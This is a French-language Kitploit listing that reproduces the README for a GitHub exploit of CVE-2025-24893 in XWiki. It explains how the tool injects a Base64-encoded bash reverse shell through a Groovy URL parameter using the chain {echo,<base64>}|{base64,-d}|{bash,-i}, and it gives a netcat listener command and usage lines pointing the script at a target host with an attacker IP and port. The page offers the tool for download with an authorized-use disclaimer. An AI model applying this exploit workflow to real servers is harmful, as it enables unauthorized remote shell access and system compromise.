Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
xwiki-15.10.8-reverse-shell-cve-2025-24893 — Exploit RCE CVE-2025-24893 pour XWiki avec capacité de shell inversé | Kitploit
Outils/GitHubGitHub/bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubbishben/xwiki-15.10.8-reverse-shell-cve-2025-24893

xwiki-15.10.8-reverse-shell-cve-2025-24893

Exploit RCE CVE-2025-24893 pour XWiki avec capacité de shell inversé

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 11 moisPas encore vérifié

CVE-2025-24893 Exploit de Reverse Shell pour XWiki

Avertissement : Ce script est destiné uniquement à des fins éducatives et à des tests de sécurité autorisés. Ne l'utilisez pas sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester. Une mauvaise utilisation peut être illégale et dangereuse.

Description

Ce script Python exploite CVE-2025-24893, une vulnérabilité d'exécution de code à distance affectant les versions de XWiki jusqu'à la 15.10.10.

  • Version testée : XWiki 15.10.8
  • Impact : Permet l'exécution de commandes arbitraires sur le serveur cible.
  • Version Python : Écrit et testé sous Python 3

Cette version étend le PoC original d'Al Baradi Joy pour générer un reverse shell. Le PoC original est disponible ici.

Comment ça marche

  • XWiki exécute du code Groovy via le paramètre d'URL.

  • L'exploit injecte une commande bash -c dans ce modèle Groovy.

  • Un reverse shell normal contient plusieurs guillemets (' et ") qui casseraient l'évaluation Groovy et l'URL.

  • Pour résoudre cela, le script encode la commande shell en une ligne en Base64.

  • La charge utile est ensuite envoyée dans l'URL et exécutée via la chaîne suivante :

    {echo,<base64>} | {base64,-d} | {bash,-i}

  • Cela décode la charge utile Base64 en toute sécurité et l'exécute avec bash -i, fournissant un reverse shell interactif.

Format de l'URL cible

  • Format : http://<target-host>
  • Ne PAS inclure :
    • Une barre oblique finale /
    • Le chemin /xwiki (le script l'ajoute automatiquement)

Exemples :

root@kitploit:~
# Correct
http://10.129.95.114:8080
http://example.com:8080

# Incorrect
http://10.129.95.114:8080/         # trailing slash
http://example.com/xwiki            # includes /xwiki

Configuration de l'écouteur

Avant d'exécuter l'exploit, vous devez démarrer un écouteur sur votre machine pour capturer le reverse shell.

Exemple avec Netcat :

root@kitploit:~
nc -lvnp <lport>
  • <lport> doit correspondre au port que vous fournissez en argument au script.

Utilisation

root@kitploit:~
python3 cve-2025-24893.py <target_base_url> <lhost> <lport>

Exemple :

root@kitploit:~
python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444
  • Le script affiche l'URL complète de l'exploit, la charge utile Base64 et les instructions pour vérifier votre écouteur.

Références

  • GHSA Advisory
  • XWiki Homepage
  • PoC original par Al Baradi Joy

Crédits

  • Preuve de concept originale : Al Baradi Joy
  • Cette version : Améliorée pour générer un reverse shell pour une exécution de commandes interactives

Avertissement

  • Utilisez cet exploit uniquement dans des environnements contrôlés (HTB, machines de laboratoire, VM vous appartenant).
  • L'utilisation non autorisée sur des serveurs publics est illégale et peut entraîner des poursuites pénales.
Télécharger l’outil